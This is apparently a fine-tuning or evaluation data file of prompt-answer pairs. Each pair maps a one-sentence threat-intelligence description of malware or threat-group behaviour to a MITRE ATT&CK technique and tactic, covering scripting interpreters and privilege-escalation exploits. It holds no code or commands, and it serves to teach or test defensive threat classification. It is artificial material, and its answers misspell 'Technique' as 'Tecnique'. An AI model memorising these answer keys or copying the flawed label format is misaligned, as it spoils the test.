+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore uses VBS files.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D uses Word macros for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE creates and uses a VBScript as part of its persistent execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can use VBScript (VBE) code for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used Word documents with VBScripts to execute malicious activities.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has the ability to save and execute VBScript.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can use a malicious VBS file for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses VBScripts.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use VBS to download and execute malicious files.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has used obfuscated VBA macros for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT has used Visual Basic for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has included embedded Visual Basic scripts in malicious documents.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi uses AutoIt and VBS scripts throughout its execution process.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE can use the VBScript function `GetRef` as part of its persistence mechanism.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST used VBScripts to initiate the execution of payloads.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has used VBA macros to execute shellcode.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used `.vbs` scripts for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot executes commands using VBScript.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can use visual basic scripts for first-stage execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has used malicious VBA macros in Microsoft Word documents and Excel spreadsheets that execute an `AutoOpen` subroutine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has several VBS scripts used throughout the malware's lifecycle.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VBShower has the ability to execute VBScript files.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can use a Visual Basic script to exclude the `C:\` drive from Windows Defender.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can execute malicious VBScript payloads on the victim’s machine.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has been distributed as HTA files with VBScript.,"Tecnique: T1059.005 Command and Scripting Interpreter: Visual Basic, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used a Python reverse shell and the PySoxy SOCKS5 proxy tool.","Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors' backdoors were written in Python and compiled with py2exe.","Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has developed malware variants written in Python.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used Python scripts to execute payloads.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used a command line utility and a network scanner written in python.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has made use of Python-based remote access tools.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used a customized version of the Impacket wmiexec.py module to create renamed output files.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.","Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used Python scripts for port scanning or building reverse shells.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete used multiple compiled Python scripts on the victim’s system. Machete's main backdoor Machete is also written in Python.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has developed tools in Python including Out1.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has used Python-based malware to install and spread their coinminer.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used Python-based tools for execution.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used Python-based implants to interact with compromised hosts.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can support commands to execute Python-based payloads.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has used Python scripts to execute payloads.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used Python scripts for execution and the installation of additional files.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use Python to perform execution.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker executes a Python script to download its second stage.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has used python scripts on the user’s system, as well as the Python variant of the Empire agent, EmPyre.","Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate shellcode outputs that execute via Python.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook is a Python-based backdoor compiled with PyInstaller.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has used Python to implement its DGA.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING is a Python web shell that can embed in the Ivanti Connect Secure CAV Python package.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy uses Python scripts for installing files and performing execution.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap uses Python for scripting to execute additional commands.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete is written in Python and is used in conjunction with additional Python scripts.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder uses a python-based payload.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has used python scripts.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.","Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt, along with its functions, is written in Python.","Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has used Python scripts to deploy ransomware.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos uses Python scripts.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY is written in Python and can use multiple Python scripts for execution on targeted systems.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can use Python scripts to execute commands.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses Python scripts.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian has the ability to use Python to spawn a Unix shell.,"Tecnique: T1059.006 Command and Scripting Interpreter: Python, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.","Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 deployed JScript web shells on compromised systems.","Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors used JavaScript code.","Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used JavaScript for drive-by downloads and C2 communications.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has executed JavaScript scriptlets on the victim's machine.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used JavaScript to execute malicious code on a victim's machine.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has used malicious JavaScript files on the victim's machine.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used JavaScript scripts to help perform tasks on the victim's machine.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used JavaScript to execute additional files.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used malicious JavaScript files for several components of their attack.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used JScript for logging and downloading additional tools.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used JavaScript in its attacks.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer infected victims using JavaScript code.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats used various implants, including those built with JS, on target machines.","Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has used JavaScript to deliver malware hosted on HTML pages.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used JavaScript files to execute its POWERSTATS payload.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used JavaScript to drop and execute malware loaders.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used JS scripts.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used JavaScript for code execution.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used various JavaScript-based backdoors.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to use JavaScript to execute PowerShell.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses JavaScript to perform its core functionalities.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has been executed through a malicious JScript downloader.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can execute JavaScript by injecting it into the victim's browser.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Cobalt Strike System Profiler can use JavaScript to perform reconnaissance actions.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman uses JavaScript to perform its core functionalities.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate shellcode outputs that execute via JavaScript or JScript.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON is written in and executed as JavaScript.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use a JavaScript file as part of its execution chain.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader can download and execute JavaScript files.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has executed malicious JavaScript code.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK had used Javascript to perform its core functions.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo includes payloads written in JavaScript.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu executes additional Jscript code on the victim's machine.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can use JavaScript code for execution.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The QakBot web inject module can inject Java Script into web banking pages visited by the victim.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The SocGholish payload is executed as JavaScript.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can execute JavaScript containing configuration data for establishing persistence.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WARPWIRE is a credential harvester written in JavaScript.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can execute malicious JavaScript payloads on the victim’s machine.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has been distributed as HTA files with JScript.,"Tecnique: T1059.007 Command and Scripting Interpreter: JavaScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments. They have also utilized AADInternals PowerShell Modules to access the API,"Tecnique: T1059.009 Command and Scripting Interpreter: Cloud API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has leveraged AWS CLI to enumerate cloud environments with compromised credentials.,"Tecnique: T1059.009 Command and Scripting Interpreter: Cloud API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu leverages the AWS CLI for its operations.,"Tecnique: T1059.009 Command and Scripting Interpreter: Cloud API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has utilized AutoIt malware scripts embedded in Microsoft Office documents or malicious links.,"Tecnique: T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses AutoIt scripts dropped to a hidden directory during initial installation phases, such as `test.au3`.","Tecnique: T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz has been distributed through an AutoIt loader script.,"Tecnique: T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 abused named pipe impersonation for privilege escalation.","Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.","Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used CVE-2016-7255 to escalate privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has exploited CVE-2021-1732 for privilege escalation.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used exploits to increase their levels of rights and privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.","Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has exploited the CVE-2016-0167 local vulnerability.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.","Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has exploited CVE-2021-1732 to execute malware components with elevated rights.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has leveraged a zero-day vulnerability to escalate privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has deployed a malicious kernel driver through exploitation of CVE-2015-2291 in the Intel Ethernet diagnostics driver for Windows (iqvw64.sys).,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
